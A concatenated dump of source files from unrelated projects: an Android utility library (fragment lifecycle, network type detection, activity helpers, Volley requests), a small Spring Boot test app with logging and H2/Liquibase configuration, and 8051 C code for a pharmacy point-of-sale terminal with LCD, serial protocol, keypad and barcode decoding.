private boolean mFixStatePagerAdapter;
@Override
public void setUserVisibleHint(boolean isVisibleToUser) {
super.setUserVisibleHint(isVisibleToUser);
LogUtil.e(toString());
if (isResumed()) {
if (!mIsSupportVisible && isVisibleToUser) {
dispatchSupportVisible(true);
} else if (mIsSupportVisible && !isVisibleToUser) {
dispatchSupportVisible(false);
}
} else if (isVisibleToUser) {
mInvisibleWhenLeave = false;
mFixStatePagerAdapter = true;
}
}
@Override
public void onHiddenChanged(boolean hidden) {
super.onHiddenChanged(hidden);
LogUtil.e(toString());
if (isResumed()) {
dispatchSupportVisible(!hidden);
}
}
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
LogUtil.e(toString());
}
@Nullable
@Override
public View onCreateView(LayoutInflater inflater, @Nullable ViewGroup container, @Nullable Bundle savedInstanceState) {
LogUtil.e(toString());
if (mRootView == null) {
mRootView = inflater.inflate(doGetContentLayout(), null);
doInit(mRootView);
}
return mRootView;
}
@Override
public void onActivityCreated(@Nullable Bundle savedInstanceState) {
super.onActivityCreated(savedInstanceState);
LogUtil.e(toString());
doLoadData();
if (!mInvisibleWhenLeave && !isHidden() && (getUserVisibleHint() || mFixStatePagerAdapter)) {
if ((getParentFragment() != null && !getParentFragment().isHidden())
|| getParentFragment() == null) {
mNeedDispatch = false;
dispatchSupportVisible(true);
}
}
}
@Override
public void onStart() {
super.onStart();
LogUtil.e(toString());
}
@Override
public void onResume() {
super.onResume();
LogUtil.e(toString());
if (!mIsFirstVisible) {
if (!mIsSupportVisible && !mInvisibleWhenLeave && !isHidden() && getUserVisibleHint()) {
mNeedDispatch = false;
dispatchSupportVisible(true);
}
}
}
@Override
public void onPause() {
super.onPause();
LogUtil.e(toString());
if (mIsSupportVisible && !isHidden() && getUserVisibleHint()) {
mNeedDispatch = false;
mInvisibleWhenLeave = false;
dispatchSupportVisible(false);
} else {
mInvisibleWhenLeave = true;
}
}
@Override
public void onStop() {
super.onStop();
LogUtil.e(toString());
}
@Override
public void onDestroyView() {
super.onDestroyView();
LogUtil.e(toString());
mIsFirstVisible = true;
mFixStatePagerAdapter = false;
}
@Override
public void onDestroy() {
super.onDestroy();
LogUtil.e(toString());
}
@Override
public void onDetach() {
super.onDetach();
LogUtil.e(toString());
}
public View getRootView() {
return mRootView;
}
public final boolean isSupportVisible() {
return mIsSupportVisible;
}
private void dispatchSupportVisible(boolean visible) {
mIsSupportVisible = visible;
if (!mNeedDispatch) {
mNeedDispatch = true;
} else {
FragmentManager fragmentManager = getChildFragmentManager();
if (fragmentManager != null) {
List<Fragment> childFragments = fragmentManager.getFragments();
if (childFragments != null) {
for (Fragment child : childFragments) {
if (child instanceof PagerFragment && !child.isHidden() && child.getUserVisibleHint()) {
((PagerFragment) child).dispatchSupportVisible(visible);
}
}
}
}
}
if (visible) {
if (mIsFirstVisible) {
mIsFirstVisible = false;
doLazyLoadData();
}
onVisible();
} else {
onInvisible();
}
}
}
<file_sep>package com.icenler.lib.receiver.network;
import android.Manifest;
import android.content.Context;
import android.net.ConnectivityManager;
import android.net.NetworkInfo;
import android.telephony.TelephonyManager;
import java.util.Locale;
/**
* Created by iCenler - 2015/9/10.
* Description:网络类型匹配
* <p/>
* {@link Manifest.permission#ACCESS_NETWORK_STATE}
*/
public class NetworkHelper {
public static final int UNKNOWN = -1;// 中国电信
public static final int CMCC = 0;// 中国移动
public static final int CUCC = 1;// 中国联通
public static final int CTCC = 2;// 中国电信
/**
* 手机号类型:移动0、联通1、电信2
*/
public static int MOBILES_TYPE = UNKNOWN;
private static final int NETWORK_TYPE_INVALID = -1; // 无网络
private static final int NETWORK_TYPE_ETHERNET = 0; // 有线
private static final int NETWORK_TYPE_WIFI = 1; // WiFi
private static final int NETWORK_TYPE_2G = 2;
private static final int NETWORK_TYPE_3G = 3;
private static final int NETWORK_TYPE_4G = 4;
/**
* @param context
* @return 当前网络是否可用
*/
public static boolean isNetworkAvailable(Context context) {
return getNetworkState(context) != NETWORK_TYPE_INVALID;
}
/**
* @param context
* @return 当前网络状态
*/
public static int getNetworkState(Context context) {
int mNetworkType = NETWORK_TYPE_INVALID;
ConnectivityManager connMgr = (ConnectivityManager) context.getSystemService(Context.CONNECTIVITY_SERVICE);
NetworkInfo netInfo = connMgr.getActiveNetworkInfo();
if (netInfo != null && netInfo.isAvailable()) {
if (netInfo.getType() == ConnectivityManager.TYPE_ETHERNET) {
// 有线网络
mNetworkType = NETWORK_TYPE_ETHERNET;
} else if (netInfo.getType() == ConnectivityManager.TYPE_WIFI) {
// WiFi 网络
mNetworkType = NETWORK_TYPE_WIFI;
} else if (netInfo.getType() == ConnectivityManager.TYPE_MOBILE) {
// 移动网络
mNetworkType = getMobileNetworkType(netInfo);
}
}
return mNetworkType;
}
/**
* @param netInfo
* @return 当前网络类型
*/
private static int getMobileNetworkType(NetworkInfo netInfo) {
// ((TelephonyManager) context.getSystemService(Context.TELEPHONY_SERVICE)).getNetworkType();
int networkType = netInfo.getSubtype();
String networkName = netInfo.getSubtypeName();
switch (networkType) {
case TelephonyManager.NETWORK_TYPE_GPRS:
//case TelephonyManager.NETWORK_TYPE_GSM:
case TelephonyManager.NETWORK_TYPE_EDGE:
case TelephonyManager.NETWORK_TYPE_CDMA:
case TelephonyManager.NETWORK_TYPE_1xRTT:
case TelephonyManager.NETWORK_TYPE_IDEN:
return NETWORK_TYPE_2G;
case TelephonyManager.NETWORK_TYPE_UMTS:
case TelephonyManager.NETWORK_TYPE_EVDO_A:
case TelephonyManager.NETWORK_TYPE_EVDO_B:
case TelephonyManager.NETWORK_TYPE_EVDO_0:
case TelephonyManager.NETWORK_TYPE_EHRPD:
case TelephonyManager.NETWORK_TYPE_HSPA:
case TelephonyManager.NETWORK_TYPE_HSDPA:
//case TelephonyManager.NETWORK_TYPE_TD_SCDMA:
return NETWORK_TYPE_3G;
case TelephonyManager.NETWORK_TYPE_LTE:
//case TelephonyManager.NETWORK_TYPE_IWLAN:
return NETWORK_TYPE_4G;
default:
// 网络制式:2G 3G 4G
// 移 动:GSM TD-SCDMA TD-LTE
// 联 通:GSM WCDMA TD-LTE||FDD-LTE
// 电 信:CDMA1X CDMA2000 TD-LTE||FDD-LTE
if (networkName.equalsIgnoreCase("TD-SCDMA") || networkName.equalsIgnoreCase("WCDMA") || networkName.equalsIgnoreCase("CDMA2000")) {
return NETWORK_TYPE_3G;
} else if (networkName.equalsIgnoreCase("TD-LTE") || networkName.equalsIgnoreCase("FDD-LTE")) {
return NETWORK_TYPE_4G;
} else {
return NETWORK_TYPE_2G;
}
}
}
/**
* @param context
* @return 网络服务提供商
*/
public static int getServiceProvider(Context context) {
TelephonyManager telMgr = (TelephonyManager) context.getSystemService(Context.TELEPHONY_SERVICE);
String simOpt = telMgr.getSimOperator();
if ("46000".equals(simOpt) || "46002".equals(simOpt)) {
return CMCC;//中国移动
} else if ("46001".equals(simOpt)) {
return CUCC;//中国联通
} else if ("46003".equals(simOpt)) {
return CTCC;//中国电信
}
return -1;// 无法识别
}
public enum NetType {
WIFI, CMNET, CMWAP, NONE
}
public static NetType getAPNType(Context context) {
ConnectivityManager connMgr = (ConnectivityManager) context.getSystemService(Context.CONNECTIVITY_SERVICE);
NetworkInfo networkInfo = connMgr.getActiveNetworkInfo();
if (networkInfo == null) {
return NetType.NONE;
}
int nType = networkInfo.getType();
if (nType == ConnectivityManager.TYPE_MOBILE) {
if (networkInfo.getExtraInfo().toLowerCase(
Locale.getDefault()).equals("cmnet")) {
return NetType.CMNET;
} else {
return NetType.CMWAP;
}
} else if (nType == ConnectivityManager.TYPE_WIFI) {
return NetType.WIFI;
}
return NetType.NONE;
}
}
<file_sep>package com.icenler.lib.utils.helper;
import android.Manifest;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.net.Uri;
import android.os.Build;
import android.provider.Settings;
import android.support.v4.app.Fragment;
import android.support.v4.app.FragmentManager;
import android.support.v4.app.FragmentTransaction;
import com.icenler.lib.utils.manager.ToastManager;
import java.io.File;
/**
* Created by iCenler - 2015/9/10.
* Description:常用系统界面跳转:
*/
public class ActivityHelper {
/**
* 拨打电话(拨号权限 编译版本为23需要动态申请权限)
*
* @param phoneNum 电话号码
*/
public static void callPhone(Context context, String phoneNum) {
Intent intent = new Intent(Intent.ACTION_CALL);
intent.setData(Uri.parse("tel:" + phoneNum));
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
if (context.checkSelfPermission(Manifest.permission.CALL_PHONE) != PackageManager.PERMISSION_GRANTED) {
// TODO: Consider calling
// public void requestPermissions(@NonNull String[] permissions, int requestCode)
// here to request the missing permissions, and then overriding
// public void onRequestPermissionsResult(int requestCode, String[] permissions,
// int[] grantResults)
// to handle the case where the user grants the permission. See the documentation
// for Activity#requestPermissions for more details.
return;
}
}
context.startActivity(intent);
}
/**
* 应用评分
*/
public static void goComment(Context context) {
try {
Intent intent = new Intent(Intent.ACTION_VIEW);
ComponentName cn = new ComponentName("com.qihoo.appstore", "com.qihoo.appstore.activities.SearchDistributionActivity");
intent.setComponent(cn);
intent.setData(Uri.parse("market://details?id=" + context.getPackageName()));
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
context.startActivity(intent);
} catch (Exception e) {
ToastManager.show(context, "您没有安装应用商城");
}
}
/**
* 内容分享
*/
public static void doShare(Context context, String subject, String content) {
try {
Intent intent = new Intent(Intent.ACTION_SEND);
intent.setType("text/plain");
intent.putExtra(Intent.EXTRA_SUBJECT, subject);
intent.putExtra(Intent.EXTRA_TEXT, content);
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
context.startActivity(intent);
} catch (Exception e) {
ToastManager.show(context, "无法分享内容");
}
}
/**
* 安装APK文件
*/
private static void installApk(Context context, String path) {
try {
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
intent.setDataAndType(Uri.fromFile(new File(path)), "application/vnd.android.package-archive");
context.startActivity(intent);
} catch (Exception e) {
ToastManager.show(context, "安装文件不存在");
}
}
/**
* 卸载 APK 文件
*/
public static void uninstallApk(Context context, String packageName) {
Intent intent = new Intent(Intent.ACTION_DELETE);
intent.setData(Uri.parse("package:" + packageName));
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
context.startActivity(intent);
}
public static void go(Context context) {
Intent intent = new Intent(Settings.ACTION_APPLICATION_DETAILS_SETTINGS);
intent.setData(Uri.parse("package:" + context.getPackageName()));
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
context.startActivity(intent);
}
/**
* 添加 Fragment
*/
public static void addFragmentToActivity(FragmentManager fragmentManager, Fragment fragment, int frameId) {
if (fragmentManager == null || fragment == null)
throw new NullPointerException();
FragmentTransaction transaction = fragmentManager.beginTransaction();
transaction.add(frameId, fragment);
transaction.commit();
}
}
<file_sep>package com.icenler.lib.common;
import com.android.volley.AuthFailureError;
import com.android.volley.Request;
import com.android.volley.toolbox.StringRequest;
import com.icenler.lib.feature.App;
import java.util.Map;
/**
* Created by iCenler - 2015/10/28:
* Description:Volley 请求封装
*/
public class VolleyRequest {
private static StringRequest strReq;
public static void reqGet(String url, String tag, RequestCallback callback) {
App.getHttpQueues().cancelAll(tag);
strReq = new StringRequest(Request.Method.GET, url, callback.successListener(), callback.errorListener());
strReq.setTag(tag);
App.getHttpQueues().add(strReq);
App.getHttpQueues().start();
}
public static void reqPost(String url, String tag, final Map<String, String> params, RequestCallback callback) {
App.getHttpQueues().cancelAll(tag);
strReq = new StringRequest(Request.Method.POST, url, callback.successListener(), callback.errorListener()) {
@Override
protected Map<String, String> getParams() throws AuthFailureError {
return params;
}
};
strReq.setTag(tag);
App.getHttpQueues().add(strReq);
App.getHttpQueues().start();
}
}
| 55067e611157d09664591c72820ab6dcbad2e531 | [
"Markdown",
"Java",
"Text",
"Gradle"
] | 46 | Java | Cenler/AppDevLib | 70c48a5acea9a49a409c34de9f7e22b7f42850c3 | 13a71633152c769ee29bfae1d3f5651794f27c45 |
refs/heads/master | <repo_name>schnesim/SpringTest<file_sep>/src/main/java/de/allianz/test/logging/LogGetRequestInterceptor.java
package de.allianz.test.logging;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.web.servlet.DispatcherType;
import org.springframework.http.HttpMethod;
import org.springframework.stereotype.Component;
import org.springframework.web.servlet.HandlerInterceptor;
@Component
public class LogGetRequestInterceptor implements HandlerInterceptor {
@Autowired
private LoggingConfigurationBean logConfig;
private Logger l = new Logger();
@Override
public boolean preHandle(HttpServletRequest request, HttpServletResponse response,
Object handler) {
if (DispatcherType.REQUEST.name().equals(request.getDispatcherType().name())
&& request.getMethod().equals(HttpMethod.GET.name())) {
if (logConfig.isRestLoggingEnabled()) {
l.logRequest(request, null);
}
}
return true;
}
}
<file_sep>/src/main/java/de/allianz/test/Endpoints.java
package de.allianz.test;
import de.allianz.test.model.JasonModel;
import de.allianz.test.model.Table2;
import de.allianz.test.model.Table1;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import java.util.UUID;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
@RestController
public class Endpoints {
@Autowired
private Table1Repository repo;
@RequestMapping("/save")
public String doSomething() {
Table1 t1 = new Table1();
t1.setCryptId(UUID.randomUUID().toString());
Table2 t2 = new Table2();
t2.setFkCryptId(t1.getCryptId());
t1.setTable2(t2);
repo.save(t1);
return "done";
}
@PostMapping(name = "/post0r", consumes = {"application/json"})
public String somePostEndpoint(@RequestBody JasonModel model) {
System.out.println(model.getName());
return "I did it";
}
}
<file_sep>/src/main/java/de/allianz/test/endpoint/ToggleLogEndpoint.java
package de.allianz.test.endpoint;
import de.allianz.test.logging.LoggingConfigurationBean;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;
@RestController
public class ToggleLogEndpoint {
@Autowired
private LoggingConfigurationBean loggingConfiguration;
public ToggleLogEndpoint() {
System.out.println("ToggleLogEndpoint constructor");
}
@RequestMapping(name = "/toggleLog", method = {RequestMethod.GET})
public String toggleSoapLog() {
loggingConfiguration.setRestLoggingEnabled(!loggingConfiguration.isRestLoggingEnabled());
return "rest log toggled to " + String.valueOf(loggingConfiguration.isRestLoggingEnabled());
}
}
<file_sep>/src/main/java/de/allianz/test/logging/LoggingConfigurationBean.java
package de.allianz.test.logging;
import org.springframework.stereotype.Component;
@Component
public class LoggingConfigurationBean {
private boolean restLoggingEnabled;
public boolean isRestLoggingEnabled() {
return restLoggingEnabled;
}
public void setRestLoggingEnabled(boolean restLoggingEnabled) {
this.restLoggingEnabled = restLoggingEnabled;
}
}
<file_sep>/src/main/java/de/allianz/test/H2Configuration.java
package de.allianz.test;
import de.allianz.test.logging.LoggableDispatcherServlet;
import org.h2.server.web.WebServlet;
import org.springframework.boot.autoconfigure.web.servlet.DispatcherServletAutoConfiguration;
import org.springframework.boot.web.servlet.ServletRegistrationBean;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.DispatcherServlet;
@Configuration
public class H2Configuration {
@Bean
public ServletRegistrationBean h2servletRegistration() {
ServletRegistrationBean registration = new ServletRegistrationBean(new WebServlet());
registration.addUrlMappings("/console/*");
return registration;
}
@Bean
public ServletRegistrationBean dispatcherRegistration() {
return new ServletRegistrationBean(dispatcherServlet());
}
@Bean(name = DispatcherServletAutoConfiguration.DEFAULT_DISPATCHER_SERVLET_BEAN_NAME)
public DispatcherServlet dispatcherServlet() {
return new LoggableDispatcherServlet();
}
}
<file_sep>/src/main/java/de/allianz/test/SpringTestApplication.java
package de.allianz.test;
import liquibase.integration.spring.SpringLiquibase;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.context.annotation.Bean;
import javax.sql.DataSource;
@SpringBootApplication
public class SpringTestApplication {
@Autowired
private DataSource dataSource;
public static void main(String[] args) {
SpringApplication.run(SpringTestApplication.class);
}
@Bean
public SpringLiquibase liquibase() {
SpringLiquibase liquibase = new SpringLiquibase();
liquibase.setChangeLog("classpath:/db/changelog/liquibase-changeLog.xml");
liquibase.setDataSource(dataSource);
return liquibase;
}
}
| 9c48f051a00f8bd8b5e26f0d8a576f10ff9ec4f8 | [
"Java"
] | 6 | Java | schnesim/SpringTest | 2a11fbded2a59f4205de6e856bc0bd3d81efcf43 | e7d90fc9405d85787198821d7b12934b9894d877 |
refs/heads/master | <file_sep>from json import JSONDecodeError
from marshmallow import Schema, fields
import nsq
class MessageSchema(Schema):
user = fields.Str()
origin = fields.Str()
destination = fields.Str()
ORIGIN = {}
DESTINATION = {}
USERS = {}
def occurrence(value, value_type):
if value in value_type.keys():
value_type[value] += 1
return value_type[value]
value_type[value] = 1
return 1
def handler(message):
schema = MessageSchema()
try:
result = schema.loads(message.body.decode())
occurrence(result['user'], USERS)
occurrence(result['destination'], DESTINATION)
occurrence(result['origin'], ORIGIN)
print(USERS)
print(DESTINATION)
print(ORIGIN)
return True
except JSONDecodeError:
return False
r = nsq.Reader(message_handler=handler, nsqd_tcp_addresses='127.0.0.1:4150',
topic='nsq_example', channel='chanel', lookupd_poll_interval=15)
if __name__ == '__main__':
nsq.run()
<file_sep>marshmallow==3.5.1
pynsq==0.8.3 | c8c49a37c4f8a88ee0052a58447c1e56de037543 | [
"Python",
"Text"
] | 2 | Python | dannycrief/pynsq_consumer | 89f0de75edc014d7ddf98845dedb0e95379b731c | 920b553c310625e3f8d5f0f9fc397bc3c1572359 |
refs/heads/master | <file_sep># FrontEndDevelopment_Directive_Assignment7.4-
Assignment 7.4 uploaded
<file_sep>import { Component } from '@angular/core';
@Component({
selector: 'app-root',
templateUrl: './app.component.html',
styleUrls: ['./app.component.css']
})
export class AppComponent {
color:string;
title = 'List Of Employees';
employees:any[]=[
{name:'abc',age:30},
{name:'cde',age:34},
{name:'fgh',age:34},
{name:'bmn',age:34}
];
}
| 002fe33201b5b3a96d23cf407f284817b3ae65e8 | [
"Markdown",
"TypeScript"
] | 2 | Markdown | gurpreet562/FrontEndDevelopment_Directive_Assignment7.4- | c722a8db14caa43cba4636c541cb12de83750da6 | 4fe3b7754a84fb4a487f5b2719ca0ed11b3df755 |
refs/heads/master | <file_sep>//Pharmicros
//<NAME> 243876, <NAME> 243875
//Comunicacao serial
#include <reg51.h>
void serial_com_config()
{
TMOD = 0x20;
TH1 = 0xFD; //19200 baud rate
SCON = 0x50; //mode 1
TR1 = 1; //timer1
}
void enviar_dado( char dado )
{
SBUF = dado; //transmissao de caractere via registro sbuf
while( TI == 0 ); //espera ate terminar transmissao
TI = 0; //clear TI flag
}
void enviar_palavra( char *palavra )
{
char i = 0;
while ( palavra[i] != 0 )
{
enviar_dado( palavra[i] );
i++;
}
}
char receber_dado()
{
while( RI == 0 ); //espera terminar recepcao do dado
RI = 0; //clear RI flag
return(SBUF); //recepcao do caractere via registro sbuf
}
char receber_palavra( char n )
{
char dados[20]; //ele nao aceita char_dados[n]
char i;
for( i=0; i<n; i++ )
{
dados[i] = receber_dado();
}
return(dados);
}
<file_sep>static void init_lcd();
static void cursor_lcd(char,char);
static void print_lcd(char*);
static char key_detect();
static void escrita_dado_lcd(char);
#define usr_digits 6
#define senha_digits 6
int i;
void usr_in(int *usr_id){
int usr_digits_in;
init_lcd();
cursor_lcd(0, 3);
print_lcd("Pharmicros");
cursor_lcd(1, 0);
print_lcd("Usr: ");
usr_digits_in = 0;
while(usr_digits_in<usr_digits){
char key = key_detect();
if(key != 0){
escrita_dado_lcd(key);
usr_id[usr_digits_in] = key;
usr_digits_in++;
}
}
}
void senha_in(int *usr_id, int *senha){
int senha_digits_in;
init_lcd();
cursor_lcd(0, 0);
print_lcd("Senha de ");
for(i=0;i<usr_digits;i++){
escrita_dado_lcd(usr_id[i]);
}
cursor_lcd(1, 3);
senha_digits_in = 0;
while(senha_digits_in<senha_digits){
char key = key_detect();
if(key != 0){
escrita_dado_lcd('*');
senha[senha_digits_in] = key;
senha_digits_in++;
}
}
}
void main()
{
int usr_id [usr_digits];
int senha [senha_digits];
usr_in(usr_id);
senha_in(usr_id,senha);
init_lcd();
cursor_lcd(0, 0);
print_lcd("usr:");
for(i=0;i<usr_digits;i++){
escrita_dado_lcd(usr_id[i]);
}
cursor_lcd(1, 0);
print_lcd("senha:");
for(i=0;i<senha_digits;i++){
escrita_dado_lcd(senha[i]);
}
while(1){
char key = key_detect();
if(key == '#'){
main();
}
}
}
<file_sep>//Pharmicros
//<NAME> 243876, <NAME> 243875
//Comunicacao serial - protocolo de recebimento
#include <reg51.h>
static void msg_travar_terminal();
static void msg_liberar_terminal();
static void msg_recebimento_horario();
static void msg_codigo_barra();
static char receber_dado();
static char receber_palavra( char n );
static void init_lcd();
static void print_lcd(char*);
static void data_horario( char, char, char, char );
static void main();
void protocolo_recebimento()
{
char dado1, dado2, dado3, dado4, dados;
char dia, mes, hora, min;
char n;
dado1 = receber_dado();
if ( dado1 == 'S' )
{
dado2 = receber_dado();
switch ( dado2 )
{
case 'T' : //travar terminal
msg_travar_terminal();
init_lcd();
print_lcd("FORA DE OPERACAO");
dado3 = receber_dado();
dado4 = receber_dado();
while ( dado3 != 'S' && dado4 != 'L' ) //liberar terminal
{
dado3 = receber_dado();
dado4 = receber_dado();
}
msg_liberar_terminal();
main();
break;
case 'L' : //liberar terminal
msg_liberar_terminal();
main();
break;
case 'H' : //date e horario
dia = receber_dado();
mes = receber_dado();
hora = receber_dado();
min = receber_dado();
data_horario( dia, mes, hora, min);
msg_recebimento_horario();
break;
case 'O' : //mensagem de resposta do servidor a entrada de operador
n = receber_dado();
dados = receber_palavra(n);
init_lcd();
print_lcd("dados");
//atraso_3s();
break;
case 'A' : //venda aberta
break;
case 'P' : //consulta de produto
n = receber_dado();
dados = receber_palavra(n);
break;
case 'C' : //comfirmação de venda
n = receber_dado();
dados = receber_palavra(n);
break;
case 'F' : //sessao de venda fechada
break;
case 'X' : //fechamento da sessao do operador
break;
case 'I' : //envio de impressao de comprovante
break;
}
}
else if ( dado1 == 'L' )
{
dado2 = receber_dado();
if ( dado2 == 'B' ) //codigo de barra
{
n = receber_dado();
dados = receber_palavra(n);
msg_codigo_barra();
//barcode_reader();
}
}
}<file_sep>//void atraso_60s()
//{
//fazer timer de 60s
//}
void data_horario( char dia, char mes, char hora, char min )
{
while( min < 60 )
{
//atraso_60s();
min++;
}
min = 0;
if ( hora < 24 )
{
hora++;
}
else
{
hora = 0;
if ( dia < 30 ) //teria q fazer um switch case para cada mes
{
dia++;
}
else
{
dia = 0;
if ( mes < 12 )
{
mes++;
}
else
{
mes = 0;
}
}
}
//botar variaveis em alguma porta, registrador
data_horario( dia, mes, hora, min );
}<file_sep># Pharmicros
Programa em C de um Microcontrolador 8-bit.
Ponto de venda de uma farmácia com controle de estoque por serial, e emissão de nota.
## Authors
* **<NAME>** - <EMAIL>
<file_sep>#include <stdio.h>
int all_widths[]={212222,222122,222221,121223,121322,131222,122213,122312,132212,221213,221312,231212,112232,122132,122231,113222,123122,123221,223211,221132,221231,213212,223112,312131,311222,321122,321221,312212,322112,322211,212123,212321,232121,111323,131123,131321,112313,132113,132311,211313,231113,231311,112133,112331,132131,113123,113321,133121,313121,211331,231131,213113,213311,213131,311123,311321,331121,312113,312311,332111,314111,221411,431111,111224,111422,121124,121421,141122,141221,112214,112412,122114,122411,142112,142211,241211,221114,413111,241112,134111,111242,121142,121241,114212,124112,124211,411212,421112,421211,212141,214121,412121,111143,111341,131141,114113,114311,411113,411311,113141,114131,311141,411131,211412,211214,211232,233111};
//char serial_in[] = {'S','T',2,0xb2,0x00};
//69 = 10110010000
// 10110010 | 000(0 0000)
// B2|00 = 178; 0
//char serial_in[] = {'S','T',3,0xb2,0x16,0x40};
//69;69 = 10110010 00010110 010000(00)
//69;69 = B2 16 40
//34,51,45,42 = 10001011000 | 11011101000 | 10111011000 |10110111000
// 10001011 00011011 10100010 11101100 01011011 1000(0000)
//34 51 45 42 = 8B 1B A2 EC 5B 80
//char serial_in[] = {'S','T',6,0x8b,0x1b,0xa2,0xec,0x5b,0x80};
void serial2pattern(unsigned char * serial_in, unsigned char *patt){
//ex:
//serial_in[] = {'S','T',2,0xb2,0x00};
//patt = output buffer array
//patt = {1,0,1,1,0,0,1,0,0,0,0}; get 11*msg digits pattern from num_bytes bytes
int num_bytes = serial_in[2];
int num_messages = num_bytes*8/11;
int current_byte;
int resto;
for(int msg=0;msg<num_messages;msg++){
for(int j=0;j<11;j++){
current_byte = (j+msg*11)/8;
resto = (j+msg*11) - current_byte*8;
//printf("%d %d \n",current_byte,resto);
patt[j+msg*11] = (serial_in[current_byte+3]>>(7-resto))&1;
}
}
}
int pattern2widths(unsigned char *pattern){
/*
Padroes sao compostos de 3 linhas e 3 colunas.
Podendo Ocupar 1,2,3,4 espacos cada linha / coluna.
A soma das larguras deve ser 11
Essa funcao transforma um array do pattern em larguras
ex: 11001100110 -> 22221
pattern[0] e sempre 1
pattern[11] eh sempre 0
*/
int larguras = 1;
for(int i=1;i<11;i++){
if(pattern[i]==pattern[i-1]){
larguras++;
}else{
larguras = larguras*10;
larguras++;
}
}
return larguras;
}
int widths2value(int larguras){
//recebe as larguras e confronta com all_widths
for(int i=0;i<107;i++){
if(larguras==all_widths[i]){
return i;
}
}
return -1;
}
void main(){
//unsigned char serial_in[] = {'S','T', 2, 0xb2, 0};
//unsigned char serial_in[] = {'S','T',3,0xb2,0x16,0x40};
unsigned char serial_in[] = {'S','T',6,0x8b,0x1b,0xa2,0xec,0x5b,0x80};
unsigned char pat2[500];
unsigned char message[11];
int lar;
int val;
int num_bytes = serial_in[2];
int num_msg = 8*num_bytes/11;
serial2pattern(serial_in,pat2);
//for(int i=0;i<num_msg*11;i++) printf("%i",pat2[i]);
//printf("\n");
for(int msg=0;msg<num_msg;msg++){
for(int j=0;j<11;j++){
message[j] = pat2[j+msg*11];
}
lar = pattern2widths(message);
val = widths2value(lar);
//for(int i=0;i<11;i++) printf("%i",message[i]);
//printf("\nLarguras: %d \n",lar);
printf("Valor: %d \n",val);
}
}
<file_sep>//Pharmicros
//<NAME> 243876, <NAME> 243875
//Comunicacao serial - protocolo de envio
#include <reg51.h>
static void enviar_dado( char dado );
static void enviar_palavra( char *palavra );
void msg_travar_terminal()
{
enviar_palavra("PT");
}
void msg_liberar_terminal()
{
enviar_palavra("PL");
}
void msg_recebimento_horario()
{
enviar_palavra("PH");
}
void msg_entrada_operador( char *operador, char *senha )
{
char n =14;
enviar_palavra("PO");
enviar_dado(n);
enviar_palavra(operador);
enviar_palavra(senha);
}
void msg_vendas_aberta()
{
enviar_palavra("PA");
}
void msg_consulta_produto( char *produto )
{
char n =7;
enviar_palavra("PP");
enviar_dado(n);
enviar_palavra(produto);
}
void msg_confirmacao_compra( char *confirmar )
{
char n =2;
enviar_palavra("PC");
enviar_dado(n);
enviar_palavra(confirmar);
}
void msg_venda_fechada()
{
enviar_palavra("PF");
}
void msg_fechar_sessao()
{
enviar_palavra("PX");
}
void msg_print_comprovante( char *n, char *imprimir) //pensar
{
enviar_palavra("PI");
enviar_palavra(n); //enviar em 2 bytes ??
enviar_palavra(imprimir);
}
void msg_codigo_barra()
{
enviar_palavra("PB");
}
<file_sep>//Pharmicros
//<NAME> 243876, <NAME> 243875
//Função de escrever no display
#include <reg51.h>
sbit RS = P3^6;
sbit E = P3^7;
void atraso_timer0_40us()
{
TMOD = 0x1; // timer 16 bits
TF0 = 0; // flag = 0
TH0 = 0xFF; // timer 74 periodos = 0x4A; FFFF-4A = FFB5
TL0 = 0xB5;
TR0 = 1; // start
while( TF0 == 0 );
TR0 = 0;
}
void atraso_timer0_1u65s()
{
int i;
for( i=0; i<40; i++ )
{
atraso_timer0_40us();
}
}
void escrita_comando_lcd( char comando )
{
RS = 0;
E = 1;
P1 = comando;
E = 0;
atraso_timer0_40us();
}
void escrita_dado_lcd( char dado )
{
RS = 1;
E = 1;
P1 = dado;
E = 0;
atraso_timer0_40us();
}
void init_lcd()
{
escrita_comando_lcd(0x38); //00111000 F=0, N=1, DL=1 barramento de 8 bits...
escrita_comando_lcd(0x0C); //00001100 D=1, C=0, B=0 display ativo...
escrita_comando_lcd(0x06); //00000110 I/D=1, S=0 mensagem fixa...
escrita_comando_lcd(0x01); //00000001 apagar display
atraso_timer0_1u65s();
}
void print_lcd( char *mensagem )
{
char i = 0;
while ( mensagem[i] != 0 )
{
escrita_dado_lcd(mensagem[i]);
i++;
}
}
void cursor_lcd( char linha, char coluna )
{
if ( linha == 0)
{
escrita_comando_lcd(0x80);
while ( coluna != 0)
{
escrita_comando_lcd(0x14); //shift cursor to the right
coluna--;
}
}
else
{
escrita_comando_lcd(0xC0); //comando de pular linha
while ( coluna != 0)
{
escrita_comando_lcd(0x14); //shift cursor to the right
coluna--;
}
}
}
//void main()
//{
// init_lcd();
// cursor_lcd(0, 3);
// print_lcd("Pharmicros");
// cursor_lcd(1, 2);
// print_lcd("Eh us guris");
// while(1);
//}
<file_sep>// Turma A - Projeto pharmicross
//<NAME> (243876)
//<NAME> (243875)
//Essa funcao ler o botao pressionado
//#include <reg51.h>
#include <stdio.h>
sfr porta3 = 0xB0;
sbit LED = porta3^5;
sfr porta0 = 0x80;
char bounce = 8;
char key_pressed;
